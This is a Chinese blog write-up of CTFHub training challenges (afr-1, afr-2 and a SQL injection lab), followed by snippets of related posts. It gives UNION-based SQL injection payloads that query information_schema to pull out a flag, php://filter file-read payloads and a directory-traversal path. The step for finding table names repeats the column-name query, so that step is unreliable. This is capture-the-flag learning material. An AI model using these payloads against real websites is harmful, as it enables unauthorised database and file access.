【CTFHUB】afr-1&afr-2&sql注入

于 2024-04-14 21:48:55 发布
阅读量350 收藏 6
点赞数 4
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115024/article/details/137755126
版权

afr-1

        打开实例后,发现传参为/?p=hello

        试着更改传参,获得回显,   /?p=flag

        无回显

没其他思路了,看看题目上有提示,需要通过文件读取漏洞求解

得到一长串base64码,解码

得到flag:n1book{afr_1_solved}

afr-2

        打开实例

查看源代码

发现其有两个目录img和img.gif

查看其前一个目录

在该目录下发现flag

得到flag:n1book{afr_2_solved}

sql注入

        打开实例,明显用sql思路解题

  查回显     

在查到4时出现

查库名

?id =-1'union select 1,database(), table_name from information_schema.tables where table_schema=database() --+

查到库名note

查表名

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

库名为fl4g(很明显flag就在此处)

查列名

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

列名为fllllag

查字段

?id=-1' union select 1,database(),group_concat(fllllag) from fl4g --+

得到flag:n1book{union_select_is_so_cool}

穿心莲滴丸
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
afr-f1.github.io
03-27
【标题】"afr-f1.github.io"是一个GitHub托管的个人或组织的网站项目,通常用于展示个人作品、博客文章或者开源项目的文档。这个标题暗示了这是一个基于静态页面生成的项目,很可能使用了GitHub Pages服务。 【描述...
ctfhub -afr -1 2 3
m0_57954651的博客
11-18 1164
补充(Linux系统上的/proc目录是一种文件系统 即proc文件系统 与其它常见的文件系统不同的是 /proc是一种伪文件系统(也即虚拟文件系统) 存储的是当前内核运行状态的一系列特殊文件 用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息 甚至可以通过更改其中某些文件来改变内核的运行状态。发现flag在flag.py flask的appkey在key.py 但是此处任意文件读取漏洞被过滤了关键词flag。p=flag 回显了 no no no。默认的传参数据为?
afr_1
weixin_45711265的博客
01-09 389
buuctf N1book ok,让我们继续看看 buuctf N1book afr_1 任意文件读取 打开靶机,发现url上有提示"p="为任意文件读取,利用php伪协议php://filter/read=convert.base64-encode/resource=index.php ?p=php://filter/read=convert.base64-encode/resource=flag(此时无后缀,因为原题p=hello无后缀,猜测后台添加后缀) 得到PD9waHAKZGllKCdubyBu
《从0到1:CTFer成长之路》--afr_1 BUUCTF
wuyaowangchuan的博客
11-17 4011
任意文件读取漏洞 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.
[第一章 web入门]afr_1
qq_43618536的博客
07-24 819
[第一章 web入门]afr_1
《从0到1:CTFer成长之路》afr_2
ZhShy
01-15 386
文章目录靶场:afr_2 靶场:afr_2
afr-example-weather-station:该示例演示了使用Amazon FreeRTOS的IoT库实现气象站的实现
03-18
适用于PSoC 6 MCU的AWS IoT和FreeRTOS:气象站 本示例演示了使用PSoC:registered:6 MCU和ModusToolbox:registered:FreeRTOS SDK的AWS IoT Weather Station。... IAR C / C ++编译器v8.42.2( IAR ) 支持的套件 ( C
ISO639-2.docx
06-16
例如,阿非利卡语(Afrikaans)的ISO 639-2代码是“afr”,而在ISO 639-1中,它的代码是“af”。这允许开发者在不同环境下灵活地识别和处理语言。 标准中还列出了多种语言,如阿非利坎语、阿瓦语、阿布哈兹语、阿伊...
士研电机液面控制器AFR-G说明书.pdf
09-14
士研电机液面控制器AFR-G说明书pdf,士研电机液面控制器AFR-G说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
afr_2
weixin_45711265的博客
01-09 327
buuctf N1book ok,让我们继续看看 buuctf N1book afr_2 打开靶机发现一张gif,查看源代码“img/img.gif",利用ls查看: /img…/ 发现flag文件,记事本打开得到n1book{afr_2_solved}
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 527
ctf题解
CTFCTFHub——web
m0_52923241的博客
09-18 619
SQL 整数型注入 题目提示整数型注入,尝试输入1,有回显,输入-1 order by一直到3,没有回显,说明有两列 做题步骤: -1 union select 1,database()——sqli -1 union select 1,group_concat(schema_name) from information_schema.schemata——information_schema,performance_schema,mysql,sqli -1 union select 1,group_conc
01ctfer/任意文件读取/afr_1 题解
最新发布
QYbkx974的博客
11-15 150
sudo docker-compose up -d 拉取镜像。docker-compose.yml 文件名称。,存在url传参,直接输入。猜测存在过滤,代码可能为。加入.php后缀后不输出。了,可以使用封装协议中的。,使用base64解码。发现打开该网页时出现。
BUUCTF [第一章 web入门]afr_1
woshicainiao666的博客
08-21 262
题目告诉我们是任意文件读取,看到?p=hello 我们将hello换成flag,得到下图。我们想到利用php伪协议看源代码有没有隐藏信息。将源代码以base64的形式输出。然后解码得到flag。
ctfhub afr-2
weixin_63810302的博客
09-28 990
ctfhub afr-2
i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞
AAAAAAAAAAAA66的博客
11-20 850
知识面决定攻击的广度,知识链决定攻击的深度。 最近尝试了一下挖洞,捣鼓了一天还是啥都没有,没有头绪后,还是去写点CTF题,扩充下知识面,2个方向算是互补吧。 工具 dirsearch(目录扫描工具) 火狐 hackbar 知识点 php://伪协议 php://伪协议是PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出的错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。 php://filter是元封装器...
《从0到1:CTFer成长之路》afr_1
ZhShy
01-12 2011
文章目录靶场:afr_1知识点解题过程Flag:n1book{afr_1_solved} 靶场:afr_1 知识点 PHP向用户提供的指定待打开文件的方式,是一个文件流 PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。 http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码
《从0到1:CTFer成长之路》--afr_2 BUUCTF
wuyaowangchuan的博客
11-18 2333
依旧是任意文件读取漏洞 进入环境 查看页面源代码 访问一下这个目录 看到…/就想到目录穿越 n1book{afr_2_solved}
阿尔法AFR-K3路由器详细教程:配置与功能详解
本文档详细介绍了阿尔法AFR-K3因特网宽带路由器的设置教程,该路由器具有多项高级功能和特性,旨在为用户提供高速、稳定且安全的网络环境。 1. **性能与稳定性**: 阿尔法路由器拥有高速稳定的运算能力,这意味着...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值